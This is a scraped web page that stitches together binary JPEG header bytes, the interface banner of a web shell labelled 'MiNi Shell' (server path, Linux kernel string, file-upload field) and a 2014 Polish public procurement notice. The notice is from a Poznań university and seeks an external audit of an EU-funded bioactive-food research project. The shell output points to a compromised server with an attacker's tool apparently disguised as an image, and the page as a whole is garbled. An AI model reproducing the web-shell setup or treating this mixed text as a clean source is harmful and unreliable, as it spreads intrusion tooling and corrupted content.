JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140210/46242-N-2014.html

<p class="kh_header"><b>Poznań: Przeprowadzenie usługi audytu zewnętrznego projektu realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka lata 2007-2013, pt.: Nowa żywność bioaktywna o zaprogramowanych właściwościach prozdrowotnych wraz ze sprawozdaniem i opinią o projekcie</b><br>
<b>Numer ogłoszenia: 46242 - 2014; data zamieszczenia: 10.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy w Poznaniu , ul. Wojska Polskiego 28, 60-637 Poznań, woj. wielkopolskie, tel. 061 8487023, 8487043, faks 061 8487043, 8487145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.au.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usługi audytu zewnętrznego projektu realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka lata 2007-2013, pt.: Nowa żywność bioaktywna o zaprogramowanych właściwościach prozdrowotnych wraz ze sprawozdaniem i opinią o projekcie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przeprowadzenie  usługi audytu zewnętrznego projektu realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka lata 2007-2013, pt.: Nowa żywność bioaktywna o zaprogramowanych właściwościach prozdrowotnych wraz ze sprawozdaniem i opinią o projekcie realizowanego na podstawie umowy o dofinansowanie nr POIG.01.01.02-00-061/09 zawartej pomiędzy Narodowym Centrum Badań i Nauki a Uniwersytetem Przyrodniczym, Wydziałem Nauk o Żywieniu i Żywności w Poznaniu, z dnia 30.12.2009 za  okres  od  01.01.2010 r. do 31.12.2014 r.
2.	Opis przedmiotu zamówienia:
2.1	Audyt należy przeprowadzić zgodnie z wytycznymi określonymi Rozporządzeniem Ministra Nauki i Szkolnictwa Wyższego z dnia 29 września 2011 w sprawie przeprowadzania audytu zewnętrznego wydatkowania środków na naukę (Dz. U. nr 207 poz. 1237) - dalej Rozporządzenie. 
2.2	Zgodnie z Dz. U. nr 207 poz. 1237 § 6 Rozporządzenia RM celem przeprowadzenia audytu jest wydanie przez audytora opinii na temat:
a.	wiarygodności danych liczbowych i opisowych zawartych w dokumentach związanych z realizowanym projektem;
b.	realizacji wydatków i uzyskania założonych efektów związanych z audytowanym projektem, zgodnie z wymaganiami zawartymi w umowie;
c.	poprawności dokumentowania i ujęcia operacji gospodarczych w wyodrębnionej dla danego projektu ewidencji księgowej.
2.3	Oprócz oceny prawidłowości realizacji projektu, audyt ma również na celu doradztwo w zakresie polepszania metod jego realizacji oraz poprawę efektywności funkcjonowania projektu.
2.4	Audytor będzie miał obowiązek przekazania kopii dokumentacji roboczych: notatek, kwestionariuszy oceny, list sprawdzających lub co najmniej wykazu badanych dokumentów i wykazu sporządzonych dokumentów. 
Ponadto Zamawiający wymaga zorganizowania spotkania otwierającego, zamykającego oraz wszelkich innych niezbędnych spotkań w trakcie prowadzenia audytu. 

2.6	Audyt projektu obejmuje w szczególności sprawdzenie:
a.	zgodności realizacji projektu z umową;
b.	kwalifikowalności wydatków poniesionych w ramach projektu (zgodnie z Wytycznymi w zakresie kwalifikowalności wydatków w ramach POIG, 2007-2013 z dnia 5 czerwca 2008  );
c.	poprawności księgowania wydatków poniesionych w ramach realizowanego projektu, ich zasadności, sposobu udokumentowania i wyodrębnienia w ewidencji księgowej;
d.	płatności wydatków związanych z projektem;
e.	wiarygodności i terminowości sprawozdań z realizacji projektu;
f.	terminowości rozliczania otrzymanych środków finansowych na realizację projektu;
g.	sposobu monitorowania realizacji celów i wskaźników projektu;
h.	sposobu przechowywania i zabezpieczania  dokumentacji dotyczącej projektu;
i.	przestrzegania przepisów o rachunkowości, zamówieniach publicznych i finansach publicznych, w tym w zakresie przestrzegania dyscypliny finansów publicznych;
j.	realizacji wniosków i zaleceń z  wcześniejszych kontroli i audytów;
k.	realizacji działań promocyjnych w ramach projektu. 
2.7 Dokumentacja dotycząca projektu 
a.	wnioski o płatność,
b.	umowy z wykonawcami,
c.	aneksy do zawartych umów,
d.	faktury,
e.	inne dokumenty niezbędne do przeprowadzenia badania audytowego.
2.8	Miejsce dotyczące przechowywania dokumentacji projektu:
Oryginały dokumentacji projektu są przechowywane w siedzibach poszczególnych konsorcjantów. Ponadto w siedzibie Beneficjenta Projektu tj. Uniwersytetu Przyrodniczego w Poznaniu - w Katedrze Technologii Żywienia Człowieka  (ul. Wojska Polskiego 31) są przechowywane kserokopie wszystkich dokumentów potwierdzone za zgodność z oryginałem. Pozostała dokumentacja przechowywana jest w budynkach:
ul. Wojska Polskiego 28 i ul. Wołyńska 19.
  2.9 Miejsce wykonania audytu (u wszystkich konsorcjantów kontrola na miejscu
	i sprawdzenie oryginałów dokumentów);
a.	Uniwersytet Przyrodniczy w Poznaniu, ul. Wojska Polskiego 28 
b.	Uniwersytet Przyrodniczy we Wrocławiu, ul. C. K. Norwida 25/27
c.	Uniwersytet Przyrodniczy w Lublinie, ul. Akademicka 13
d.	Uniwersytet Medyczny w Poznaniu, ul. A. Fredry 10
e.	Uniwersytet Ekonomiczny w Poznaniu, al. Niepodległości 10
f.	Instytut Włókien Naturalnych i Roślin Zielarskich w Poznaniu, ul. Wojska Polskiego 71b
Uwaga ! Zamawiający informuje, ze zgodnie z zapisem zawartym w pkt 2.8 i 2.9 niniejszego opisu przedmiotu zamówienia nie udostępnia w inny sposób dokumentacji objętej audytem. Nie udostępnia również urządzeń kserujących i powielających.
2.10	Zakres audytu:
a.	gotowość organizacyjną beneficjenta i poprawność jego procedur wewnętrznych,
b.	audyt finansowy,
c.	audyt realizacji projektu,
d.	wizyta na miejscu realizacji projektu,
e.	prawidłowość i rzetelność prowadzenia i archiwizowania dokumentacji,
f.	wdrażanie zaleceń pokontrolnych,
g.	analiza powodzenia projektu.
Ponadto audyt powinien obejmować analizę dokumentacji oraz stosowanych procedur kontroli wewnętrznej w odniesieniu do przekazywania i rozliczania otrzymanych środków, procedur akceptacji wydatków kwalifikowanych w zakresie ich zasadności i odpowiedniego udokumentowania oraz sprawozdawania realizacji projektu ze szczególnym uwzględnieniem realizacji przyjętych celów projektu i realizacji postanowień umowy o dofinansowanie projektu. 
2.11	Na podstawie zebranych dowodów audytor sporządzi pisemne sprawozdania z I i II 	etapu audytu, zgodnie z Dz. U. nr 207 poz. 1237 § 13. 1. zwane dalej 	sprawozdaniem. 
2.12	Zgodnie z Dz. U. nr 207 poz. 1237 par. 14.1 Rozporządzenia  sprawozdanie zawierać będzie: 
a.	datę sporządzenia;
b.	nazwę i adres audytowanego podmiotu;
c.	nazwę i numer projektu - w  przypadku  audytu projektu;
d.	oświadczenie audytora o niezależności od audytowanego podmiotu;
e.	imiona, nazwiska i określenie uprawnień  audytorów;
f.	cele  audytu;
g.	podmiotowy i przedmiotowy zakres audytu;
h.	termin, w którym przeprowadzono audyt;
i.	zwięzły    opis  działań  audytowanego   podmiotu w obszarze objętym audytem;
j.	ocenę adekwatności i skuteczności systemu zarządzania i kontroli w  obszarze działalności  audytowanego podmiotu objętym audytem;
k.	informację o  metodzie doboru i wielkości  próby do badania;
l.	zaprezentowanie   wyników  badania,   w   których stwierdzono nieprawidłowości;
m.	określenie kwoty uzyskanych, rozliczonych i przechodzących na  kolejny rok  środków dotacji;
n.	określenie kwoty nierozliczonych środków dotacji podlegających zwrotowi;
o.	określenie nieprawidłowości w działalności audytowanego  podmiotu  oraz   analizę  ich   przyczyn i skutków;
p.	zalecenia w sprawie usunięcia stwierdzonych nieprawidłowości w działalności audytowanego podmiotu;
q.	podpisy audytorów, a  w  przypadku gdy  audytorem jest  osoba prawna albo jednostka  organizacyjna nieposiadająca osobowości  prawnej nazwę jednostki. 
2.13	Wykonawca przedłoży sprawozdanie końcowe z każdego z etapów audytu w 3 	egzemplarzach, w języku polskim w formie pisemnej oraz załączy w/w sprawozdanie 	na płycie CD w formacie pdf. Zakres i sposób sporządzenia sprawozdania został opisany w Dz. U. nr 	207 poz. 1237 Rozporządzenia.
2.14	Audytorem może być:
1.	Zgodnie z Dz. U. nr 207 poz. 1237 par. 2. 1. Rozporządzenia  audytorem, może być:
a.	osoba  spełniająca warunki określone w  art.  286 ustawy z dnia 27 sierpnia 2009  r. o finansach publicznych (Dz. U. Nr 157, poz. 1240, z późn. zm.);
b.	osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej, zatrudniająca przy przeprowadzaniu audytu  osoby, o  których mowa w pkt a.
2.	Zgodnie z Dz. U. nr 207 poz. 1237 par. 2. 2. Rozporządzenia audytorem nie może być: 
a.	podmiot zależny od audytowanego podmiotu;
b.	podmiot dokonujący badania sprawozdania finansowego audytowanego podmiotu w  okresie 3 lat poprzedzających audyt.

3.	Opis projektu, który podlega audytowi:
Audytowi podlegają zadania wykonywane w ramach projektu rozwojowego 
pt: Nowa żywność bioaktywna o zaprogramowanych właściwościach prozdrowotnych realizowanego w konsorcjum naukowym o zasięgu ogólnokrajowym:
3.1	Ustalenie preferencji konsumenckich w zakresie produktów bioaktywnych, Wykonawca: Uniwersytet Ekonomiczny w Poznaniu.
3.2	Zakres prac tego etapu obejmuje ustalenie optymalnego poziomu natężenia podstawowych rodzajów smaku. Reprezentatywnej grupie badanych osób (konsumentów) zostaną przedstawione roztwory smaków podstawowych w 5 różnych stężeniach wg metody limitów . Drugi etap obejmuje ustalenie reprezentatywnej grupy osób ze wskazanymi w projekcie jednostkami chorobowymi. Następnie planuje się ustalenie preferencji danej grupy wobec danego rodzaju i natężenia smaku. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.3	Zakres prac tego etapu obejmuje ustalenie optymalnego poziomu natężenia podstawowych rodzajów smaku. Reprezentatywnej grupie badanych osób (konsumentów) zostaną przedstawione roztwory smaków podstawowych w 5 różnych stężeniach wg metody limitów . Drugi etap obejmuje ustalenie reprezentatywnej grupy osób ze wskazanymi w projekcie jednostkami chorobowymi. Następnie planuje się ustalenie preferencji danej grupy wobec danego rodzaju i natężenia smaku. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu, Uniwersytet Przyrodniczy we Wrocławiu, Instytut Włókien Naturalnych i Roślin Zielarskich w Poznaniu.
3.4	Wybór odmian wybranych warzyw kapustowatych o najwyższej zawartości  glukozynolanów i produktów ich rozpadu. Badania laboratoryjne krajowych odmian nasion roślin strączkowych oraz ziół charakteryzujących się najwyższą zawartością polifenoli. Wykonawcy: Uniwersytet Przyrodniczy w Poznaniu/ Instytut Włókien Naturalnych i Roślin Zielarskich w Poznaniu/ Uniwersytet Przyrodniczy w Lublinie.
3.5	Separacja fragmentów roślin, Wykonawcy: Uniwersytet Przyrodniczy w Poznaniu.
3.6	Instytut Włókien Naturalnych i Roślin Zielarskich w Poznaniu/ Uniwersytet Przyrodniczy w Lublinie.
3.7	Zakres zadania obejmuje separację składników bioaktywnych zawartych w świeżym soku ziemniaczanym, badania prowadzone były na potrzeby innych uczestników projektu. Wykonawca:  Uniwersytet Przyrodniczy w Poznaniu, Uniwersytet Przyrodniczy we Wrocławiu, Instytut Włókien Naturalnych i Roślin Zielarskich w Poznaniu.
3.8	Charakterystyka chemiczna uzyskanych frakcji będzie obejmować oznaczenie składu podstawowego oraz potencjału antyoksydacyjnego. Zostaną przeprowadzone: analiza składu frakcji błonnika (Van Soest, Aspa), zawartość białka (Kjejdhal), tłuszczu (Soxhlet). Wykonawca: Uniwersytet Przyrodniczy w Poznaniu, Instytut Włókien Naturalnych i Roślin Zielarskich.
3.9	Ekstrakty (w postaci sypkiej) otrzymane w skali półtechnicznej zostaną poddane analizie sensorycznej metodą punktową i opisową. W suchych ekstraktach oceniana będzie konsystencja i zapach, a w wodnych ich roztworach -smak, zapach i barwa. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu, Instytut Włókien Naturalnych i Roślin Zielarskich, Uniwersytet Przyrodniczy w Lublinie.
3.10	W badaniach nad bezpieczeństwem pozyskanych produktów oznaczona zostanie ich cytotoksyczność i genotoksyczność w odniesieniu do prawidłowych komórek nabłonka jelitowego szczura izolowanych z jelita cienkiego (IEC-6), ludzkich komórek nabłonkowych izolowanych z jelita grubego (Caco-2), komórek wątroby (HepG2) oraz ludzkich komórek limfoidalnych (GM06904). Do oceny cytotoksyczności wykorzystane zostaną testy oparte na oznaczeniu aktywności metabolicznej komórek: test MTT lub test NRU w zależności od właściwości produktu. Ponadto przewiduje się oznaczenie integralności błon komórkowych przez barwienie komórek błękitem trypanu oraz oznaczenie ilości komórek metodą hemocytometryczną. Na podstawie uzyskanych wyników badań wyznaczona zostanie dawka IC50 określająca stężenie preparatu powodujące 50% inhibicję wzrostu i przeżywalności komórek. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu, Instytut Włókien Naturalnych i Roślin Zielarskich, Uniwersytet Przyrodniczy w Lublinie, Uniwersytet Medyczny w Poznaniu.
3.11	Projektowanie finalnej postaci produktu. Celem zadania jest opracowanie składu  produktu zawierającego biologiczne aktywne składniki charakteryzującego się jednocześnie atrakcyjną dla konsumenta postacią. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.12	Konstruowanie produktów stałych Przygotowanie surowców zbożowych i konstruowanie ich na bazie produktów będących matrycą dla substancji bioaktywnych (płatki zbożowe, pieczywo chrupkie, makarony, trwałe pieczywo cukiernicze. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.13	Zwiększanie biodostępności i jego ocena. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.14	Zastosowanie opakowań giętkich dla 10 ÷ 20 produktów.  2. Zapakowanie w opakowania jednostkowe - próżniowe lub w atmosferze modyfikowanej. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.15	Zabezpieczenie związków aktywnych pozyskanych z surowców pochodzenia roślinnego przed polimeryzacją, agregacją, depolimeryzacją, utlenieniem, atakiem mikrobiologicznym. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.16	Opracowanie technologii w skali laboratoryjnej otrzymywania ciekłych produktów o zaprogramowanych właściwościach prozdrowotnych na bazie soków i przecierów owocowych i warzywnych oraz hydrokoloidów. Otrzymanie w skali laboratoryjnej ciekłych produktów o zaprogramowanych właściwościach prozdrowotnych na bazie soków i przecierów owocowych i warzywnych oraz hydrokoloidów. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu, Uniwersytet Przyrodniczy we Wrocławiu, Uniwersytet Medyczny w Poznaniu.
3.17	Opracowanie koncepcji linii technologicznych do przemysłowej produkcji wybranych produktów. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.18	Ocena składu chemicznego wyizolowanych frakcji i gotowych produktów. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.19	Ocena bezpieczeństwa frakcji i gotowych produktów: Ocena toksykologiczna, mikrobiologiczna, właściwości mutagenne, genotoksyczne, cytotoksyczne, alergiczne. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.20	Ocena wartości żywieniowej gotowych produktów. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.21	Ocena sensoryczna produktów finalnych. Wykonawca: Uniwersytet Przyrodniczy w Poznaniu.
3.22	Badania kliniczne nad aktywnością prozdrowotną wybranych produktów. Uniwersytet Przyrodniczy w Poznaniu.
3.23	Badania rynkowe. Wykonawca: Uniwersytet Ekonomiczny w Poznaniu.
3.24.	Pozostałe informacje dotyczące projektu:
Cel projektu: celem projektu jest opracowanie innowacyjnej technologii produkcji nowych linii produktów spożywczych ograniczających zachorowalność na choroby cywilizacyjne, w tym na choroby sercowo-naczyniowe, otyłość, cukrzycę, anemię. Wzbogaci to ofertę rynkową i eksportową polskiego przemysłu spożywczego i zwiększy jego międzynarodową konkurencyjność.
-Ilość Konsorcjantów: 6.
-Całkowita wartość projektu: 39 565 768,59 PLN. 
-Wartość wydatków kwalifikowalnych: 35 134 113,28 PLN.
-Kwota dofinansowania z UE (85%): 29 863 996,29 PLN.
-Ilość złożonych wniosków o płatność: 61.
-Ilość przeprowadzonych postępowań przetargowych: ponad 50 (na zakup aparatury, odczynników chemicznych, drobnego sprzętu laboratoryjnego, szkła, artykułów biurowych itp.).
-Ilość faktur VAT: ok 3000.
-Ilość realizowanych zadań: 15..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3, 79.21.21.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium i zabezpieczenia należytego wykonania umowy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają udokumentowane doświadczenie w zakresie przeprowadzenia minimum dwóch audytów finansowanych zgodnie z Dz. U. nr 207 poz. 1237 § 7 przeprowadzonych w przeciągu ostatnich trzech lat. Udokumentowane audyty zewnętrzne poparte winny być referencjami dotyczącymi projektów naukowych realizowanych przez jednostki naukowe w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, zgodnie z wymaganiami Rozporządzenia Ministra Nauki i Szkolnictwa Wyższego z dnia 29 września 2011 r. w sprawie przeprowadzania audytu zewnętrznego wydatkowania środków finansowych na naukę</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony formularz oferty - załącznika nr 1
2. wykaz wykonanych,  minimum dwóch audytów finansowanych zgodnie z Dz. U. nr 207 poz. 1237., a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (załącznik nr 5) oraz załączeniem dokumentu (np. zaświadczenie wystawione przez podmiot zlecające badania audytowe) potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie, (na potwierdzenie warunku określonego w rozdziale VIII pkt 3 niniejszej SIWZ),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
